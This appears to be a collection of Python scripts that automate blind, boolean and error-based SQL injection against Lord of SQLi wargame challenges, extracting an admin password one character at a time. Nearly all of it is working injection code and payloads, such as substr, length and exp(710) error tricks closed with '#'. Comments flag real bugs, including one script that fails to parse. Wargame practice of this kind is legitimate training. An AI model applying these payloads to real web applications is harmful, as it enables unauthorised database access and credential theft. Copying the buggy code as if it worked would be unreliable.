los.rubiya.kr - blind SQL injection (SQLi) Python automation.
import requests

# LOS "assassin" solver: blind SQL injection driven by the response text.
# Oracle: "Hello admin" in the body means the guess matched the admin row,
# "Hello guest" means it matched the guest row.
password = ''
password_length = -1
URL = 'https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php'
# Sent on a body-less GET; the request carries only query parameters.
headers = {'Content-Type': 'application/json; charset=utf-8'}
# Placeholder: the script sends this literal value unless it is edited.
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}
guest_length = -1

# Phase 1: password length. 'pw' is a run of '_' characters, one per
# candidate length; the first length that answers "Hello admin" wins.
# NOTE(review): every requests.get below is called without timeout=, so a
# stalled server blocks the script indefinitely.
for estimated_length in range(1, 20):
    query = {'pw': '_' * estimated_length}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if "Hello admin" in res.text:
        password_length = estimated_length
        print("admin's password length is {}".format(password_length))
        break
    elif "Hello guest" in res.text:
        # Kept only as a fallback; overwritten by each later guest hit.
        guest_length = estimated_length
# Fallback: no admin hit at all, so reuse the last length that hit guest.
# If neither row ever matched, password_length stays -1 and the loop below
# runs zero times.
if guest_length > 0 and password_length < 0:
    print("admin's password length is not found. using guest's password length: {}".format(guest_length))
    password_length = guest_length

# Phase 2: one character per position. The known prefix is kept, the
# candidate is appended, and the remaining positions are padded with '_'.
for current_password_length in range(1, password_length+1) :
    guest_character = ''
    is_found = False
    for password_chr in range(ord('0'),ord('z')+1) :
        query={'pw': password + chr(password_chr) + '_' * (password_length - current_password_length)}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if "Hello admin" in res.text:
            password = password+chr(password_chr)
            is_found = True
            print(password)
            break
        elif "Hello guest" in res.text:
            # Last candidate that hit the guest row; used if admin never hits.
            guest_character = chr(password_chr)
    if is_found is False:
        # guest_character may still be '' when nothing matched either row;
        # the position is then skipped and the final length check fails.
        password = password + guest_character
        print("admin's password character unknown. using guest's password character")
        print(password)
# Reported only when every position produced a character. Both casings are
# printed; this script never tests which one is correct.
if len(password) == password_length:
    print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))
import requests

# LOS "bugbear" solver. The injected expression travels in the 'no'
# parameter while 'pw' is a fixed '1'. Oracle: "Hello admin" in the body.
password = ''
password_length = 0
URL = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php'
# Sent on a body-less GET; the request carries only query parameters.
headers = {'Content-Type': 'application/json; charset=utf-8'}
# Placeholder: the script sends this literal value unless it is edited.
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}

# Phase 1: length. The fixed prefix constrains left(id,5); the appended
# clause asks length(pw) < N for N = 0, 1, ... The first N that answers
# "Hello admin" means the length is N - 1.
# NOTE(review): requests.get is called without timeout= throughout.
for estimated_length in range(100):
    query={'pw': '1',
           'no': '1||left(id,5)<"admio"&&left(id,5)>"admim"' + '&&length(pw)<' + str(estimated_length)}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if("Hello admin" in res.text):
        password_length = estimated_length - 1
        print("admin's password length is {}".format(password_length))
        break
# Bail out when the loop finished without a hit (password_length still 0).
# NOTE(review): exit() is the interactive-site helper; sys.exit() is the
# conventional choice in a script.
if password_length < 1:
    print("Password length unknown")
    exit()

# Phase 2: for position k, find the first candidate c (ascending from '0')
# with right(left(pw,k),1) < c; the character at k is then the one before c.
for current_password_length in range(1, password_length+1) :
    for password_chr in range(ord('0'),ord('z')+1) :
        query={'pw': '1',
               'no': '1||left(id,5)<"admio"&&left(id,5)>"admim"&&right(left(pw,' + \
               str(current_password_length) +'),1)<"' + chr(password_chr) + '"'}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if("Hello admin" in res.text):
            password = password+chr(password_chr - 1)
            print(password)
            break
# Both casings are printed; this script never tests which one is correct.
if len(password) == password_length:
    print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))
import requests

# LOS "dark_eyes" solver. Oracle: a non-empty response body means one of the
# candidates in the IN-list matched; an empty body means none did. exp(710)
# is appended to every candidate list, presumably to force a query error when
# nothing else matches (compare the "DOUBLE value is out of range" check in
# the iron_golem script) -- not verifiable from this file alone.
URL='https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php'
params={'pw':''}
# Placeholder: the script sends this literal value unless it is edited.
cookies={'PHPSESSID':'INSERT_YOUR_COOKIE_HERE'}
password_length = -1
password = ''


def request_and_response(query):
    """Send *query* as the 'pw' parameter; True iff the response body is non-empty.

    Mutates the module-level ``params`` dict in place.
    NOTE(review): no timeout= on the request, so a stalled server blocks.
    """
    params['pw']=query
    res = requests.get(URL, cookies=cookies, params=params)
    if res.text != "":
        return True
    else:
        return False


# Phase 1: length. `guess` accumulates "0,0,1,2,...,N"; because every
# earlier value already failed, a hit identifies the newly added N.
# If no length hits, password_length stays -1 and the loop below is empty.
guess = '0'
for estimated_length in range(20):
    guess = "{},{}".format(guess, estimated_length)
    query = "' or id='admin' and length(pw) in ({})#".format("{},exp(710)".format(guess))
    if request_and_response(query):
        password_length=estimated_length
        print("Password length is {}.".format(password_length))
        break

# Phase 2: the same cumulative IN-list per character position.
for character_position in range(1, password_length+1):
    guess = "'0'"
    for estimated_character_ord in range(ord('0'), ord('z')+1):
        guess = "{},'{}'".format(guess, chr(estimated_character_ord))
        query = "' or id='admin' and substr(pw,{},1) in ({})#".format(character_position, "{},exp(710)".format(guess))
        if request_and_response(query):
            password = password + chr(estimated_character_ord)
            print(password)
            break
# NOTE(review): the print below is missing its final ')' and does not parse
# as written, so the whole file fails to load until it is closed.
if len(password) == password_length:
    print("Got it. Password is {} or {}".format(password.upper(), password.lower())
import requests

# LOS "darkknight" solver. The injected expression travels in the 'no'
# parameter while 'pw' is a fixed '1'. Oracle: "Hello admin" in the body.
# Three phases: the admin row's `no`, then the password length, then the
# password one character at a time.
password = ''
password_length = 0
no = 0
URL = 'https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php'
# Sent on a body-less GET; the request carries only query parameters.
headers = {'Content-Type': 'application/json; charset=utf-8'}
# Placeholder: the script sends this literal value unless it is edited.
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}

# Phase 1: `no`. Asks no < N for N = 0, 1, ...; the first hit means N - 1.
# NOTE(review): requests.get is called without timeout= throughout.
for estimated_value in range(100):
    query={'pw': '1',
           'no': '1 or left(id, 1) < \"b\" and no < ' + str(estimated_value)}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if("Hello admin" in res.text):
        no = estimated_value - 1
        print("admin's no is {}".format(no))
        break
# Phase 2: length, with the recovered `no` pinned via no < no+1.
for estimated_length in range(100):
    query={'pw': '1',
           'no': '1 or left(id, 1) < \"b\" and no < ' + str(no+1) + \
           ' and length(pw) < ' + str(estimated_length)}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if("Hello admin" in res.text):
        password_length = estimated_length - 1
        print("admin's password length is {}".format(password_length))
        break
# Bail out when the loop finished without a hit (password_length still 0).
# NOTE(review): exit() is the interactive-site helper; sys.exit() is the
# conventional choice in a script.
if password_length < 1:
    print("Password length unknown")
    exit()

# Phase 3: for position k, find the first candidate c (ascending from '0')
# with right(left(pw,k),1) < c; the character at k is then the one before c.
for current_password_length in range(1, password_length+1) :
    for password_chr in range(ord('0'),ord('z')+1) :
        query={'pw': '1',
               'no': '1 or left(id, 1) < \"b\" and no < ' + str(no+1) + \
               ' and right(left(pw, ' + str(current_password_length) +'), 1) < \"' + chr(password_chr) + '\"'}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if("Hello admin" in res.text):
            password = password+chr(password_chr - 1)
            print(password)
            break
# Both casings are printed; this script never tests which one is correct.
if len(password) == password_length:
    print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))
import requests

# LOS "golem" solver. The injected expression travels in 'pw' and is closed
# with '#'. Oracle: "Hello admin" in the body.
password=''
password_length = 0
URL = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php'
# Sent on a body-less GET; the request carries only query parameters.
headers = {'Content-Type': 'application/json; charset=utf-8'}
# Placeholder: the script sends this literal value unless it is edited.
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}

# Phase 1: length. Asks length(pw) < N for N = 0, 1, ...; the first hit
# means the length is N - 1.
# NOTE(review): requests.get is called without timeout= throughout.
for estimated_length in range(100):
    query={'pw': '\' || substring(id, 1, 1) < \'b\' && length(pw) < ' + str(estimated_length) + '#'}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if("Hello admin" in res.text):
        password_length = estimated_length - 1
        print("admin's password length is {}".format(password_length))
        break
# Bail out when the loop finished without a hit (password_length still 0).
# NOTE(review): exit() is the interactive-site helper; sys.exit() is the
# conventional choice in a script.
if password_length < 1:
    print("Password length unknown")
    exit()

# Phase 2: compares the k-character prefix against the known prefix plus a
# candidate. The candidate is sent through .capitalize() (upper-cased for a
# single character) but the recovered character is chr(ordinal - 1) of the
# raw, non-capitalized ordinal -- the two deliberately differ here.
for current_password_length in range(1, password_length+1):
    for password_chr in range(ord('0'),ord('z')+1) :
        query={'pw': '\' || substring(id, 1, 1) < \'b\' && substring(pw,1,' + \
               str(current_password_length) + ') < \'' + password + chr(password_chr).capitalize() + '\'#'}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if("Hello admin" in res.text):
            password = password + chr(password_chr - 1)
            print(password)
            break
# Both casings are printed; this script never tests which one is correct.
if len(password) == password_length:
    print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))
import requests

# LOS "iron_golem" solver, error-based variant. Each guess is wrapped in
# if(<cond>,1,exp(710)); the oracle is the absence of the string
# "DOUBLE value is out of range" in the response body.
URL = 'https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php'
# Placeholder: the script sends this literal value unless it is edited.
cookies = {'PHPSESSID':'INSERT_YOUR_COOKIE_HERE'}
params = {'pw':''}
password = ''
password_length = -1

# Phase 1: exact length test, N = 0..99. If nothing hits, password_length
# stays -1 and the loop below runs zero times.
# NOTE(review): requests.get is called without timeout= throughout.
for estimated_password_length in range(100):
    params['pw'] = "1' or id='admin' and if(length(pw)={},1,exp(710))#".format(estimated_password_length)
    res = requests.get(URL, cookies=cookies, params=params)
    print("Trying {}...".format(estimated_password_length))
    if "DOUBLE value is out of range" not in res.text:
        password_length = estimated_password_length
        break
# Phase 2: exact-match test per position and candidate, one request each.
# NOTE(review): range(password_length+1) starts at 0, so the first pass
# queries substr(pw,0,1); the sibling scripts start their position loop at 1.
for character_position in range(password_length+1):
    for estimated_character_ord in range(ord('0'), ord('z')+1):
        params['pw'] = "1' or id='admin' and if(substr(pw,{},1)='{}',1,exp(710))#".format(character_position, chr(estimated_character_ord))
        res = requests.get(URL, cookies=cookies, params=params)
        print("Trying {} at {}...".format(chr(estimated_character_ord), character_position))
        if "DOUBLE value is out of range" not in res.text:
            password = password + chr(estimated_character_ord)
            print(password)
            break
# Unlike the sibling scripts there is no final "Got it" summary here.
# maybe need to do some binary search!
import requests

# LOS "orc" solver. The injected expression travels in 'pw' and is closed
# with '#'. Oracle: "Hello admin" in the body. The "orge" script in this
# gist is identical apart from the URL.
password = ''
password_length = 0
URL = 'https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
# Sent on a body-less GET; the request carries only query parameters.
headers = {'Content-Type': 'application/json; charset=utf-8'}
# Placeholder: the script sends this literal value unless it is edited.
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}

# Phase 1: length. Asks length(pw) < N for N = 0, 1, ...; the first hit
# means the length is N - 1.
# NOTE(review): requests.get is called without timeout= throughout.
for estimated_length in range(100):
    query={'pw': '\' || id=\'admin\' && length(pw) < '+str(estimated_length)+'#'}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if("Hello admin" in res.text):
        password_length = estimated_length - 1
        print("admin's password length is {}".format(password_length))
        break
# Bail out when the loop finished without a hit (password_length still 0).
# NOTE(review): exit() is the interactive-site helper; sys.exit() is the
# conventional choice in a script.
if password_length < 1:
    print("Password length unknown")
    exit()

# Phase 2: exact prefix match -- the known prefix plus one candidate is
# compared with substr(pw,1,k) for equality.
for current_password_length in range(1, password_length+1) :
    for password_chr in range(ord('0'),ord('z')+1) :
        query={'pw': '\' || substr(pw,1,'+str(current_password_length)+')=\''+password+chr(password_chr)+'\'#'}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if("Hello admin" in res.text):
            password=password+chr(password_chr)
            print(password)
            break
# Both casings are printed; this script never tests which one is correct.
if len(password) == password_length:
    print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))
import requests

# LOS "orge" solver. The injected expression travels in 'pw' and is closed
# with '#'. Oracle: "Hello admin" in the body. Identical to the "orc"
# script in this gist apart from the URL.
password = ''
password_length = 0
URL = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php'
# Sent on a body-less GET; the request carries only query parameters.
headers = {'Content-Type': 'application/json; charset=utf-8'}
# Placeholder: the script sends this literal value unless it is edited.
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}

# Phase 1: length. Asks length(pw) < N for N = 0, 1, ...; the first hit
# means the length is N - 1.
# NOTE(review): requests.get is called without timeout= throughout.
for estimated_length in range(100):
    query={'pw': '\' || id=\'admin\' && length(pw) < '+str(estimated_length)+'#'}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if("Hello admin" in res.text):
        password_length = estimated_length - 1
        print("admin's password length is {}".format(password_length))
        break
# Bail out when the loop finished without a hit (password_length still 0).
# NOTE(review): exit() is the interactive-site helper; sys.exit() is the
# conventional choice in a script.
if password_length < 1:
    print("Password length unknown")
    exit()

# Phase 2: exact prefix match -- the known prefix plus one candidate is
# compared with substr(pw,1,k) for equality.
for current_password_length in range(1, password_length+1) :
    for password_chr in range(ord('0'),ord('z')+1) :
        query={'pw': '\' || substr(pw,1,'+str(current_password_length)+')=\''+password+chr(password_chr)+'\'#'}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if("Hello admin" in res.text):
            password=password+chr(password_chr)
            print(password)
            break
# Both casings are printed; this script never tests which one is correct.
if len(password) == password_length:
    print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))
import requests

# LOS "xavis" solver for a password made of Hangul syllables. Oracle:
# "Hello admin" in the body. Two steps per position: narrow the character
# to an interval between two of the 14 initial-consonant syllables in
# hangul_strings, then test every code point in that interval for equality.
password = ''
password_length = -1
URL = 'https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php'
# Sent on a body-less GET; the request carries only query parameters.
headers = {'Content-Type': 'application/json; charset=utf-8'}
# Placeholder: the script sends this literal value unless it is edited.
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}

# Phase 1: exact length test, N = 1..19. The author divides the reported
# length by 3 on the assumption that length() counts bytes and each Hangul
# syllable is 3 bytes (see the message below); integer division, so a
# length that is not a multiple of 3 is silently rounded down.
# NOTE(review): requests.get is called without timeout= throughout.
for estimated_length in range(1, 20):
    query = {'pw': "' or length(pw)={} and id='admin".format(estimated_length)}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if "Hello admin" in res.text:
        password_length = int(estimated_length / 3)
        print("admin's password length is {}(mysql takes hangul for 3).".format(password_length))
        break

# Phase 2: per position.
for current_password_length in range(1, password_length+1) :
    base_password_index = -1
    base_password_limit = -1
    hangul_strings = "가나다라마바사아자차카타파하"
    # Step A: first anchor syllable that is greater than the character;
    # the character lies in [anchor[index-1], anchor[index]).
    for index, password_chr in enumerate(hangul_strings):
        query={'pw': "' or substring(pw,{},1)<'{}' and id='admin".format(current_password_length, password_chr)}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if "Hello admin" in res.text:
            base_password_index = index - 1
            base_password_limit = index
            print("Looking for password between {} and {}".\
                  format(hangul_strings[base_password_index], hangul_strings[base_password_limit]))
            break
    # NOTE(review): both "no anchor matched" and "matched at index 0" leave
    # base_password_index == -1, so this check cannot tell them apart --
    # the author's own note below describes the same problem.
    if base_password_index < 0:
        print("Password character {} is not a word(before '가')".format(current_password_length))
        break
    # bug when 'if base_password_index' and base_password_index is 0('가')
    # Step B: exhaustive equality test over the interval's code points.
    # The for/else fires when no code point matched and ends the outer loop.
    if base_password_index >= 0:
        for password_ord in range(ord(hangul_strings[base_password_index]), ord(hangul_strings[base_password_limit])):
            query = {'pw': "' or substring(pw,{},1)='{}' and id='admin".format(current_password_length, chr(password_ord))}
            res = requests.get(URL, params=query, headers=headers, cookies=cookies)
            if "Hello admin" in res.text:
                password = password + chr(password_ord)
                print(password)
                break
        else:
            print("Password at {} not found.".format(current_password_length))
            break
# Both casings are printed as in the sibling scripts; for Hangul the two
# strings are the same.
if len(password) == password_length:
    print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))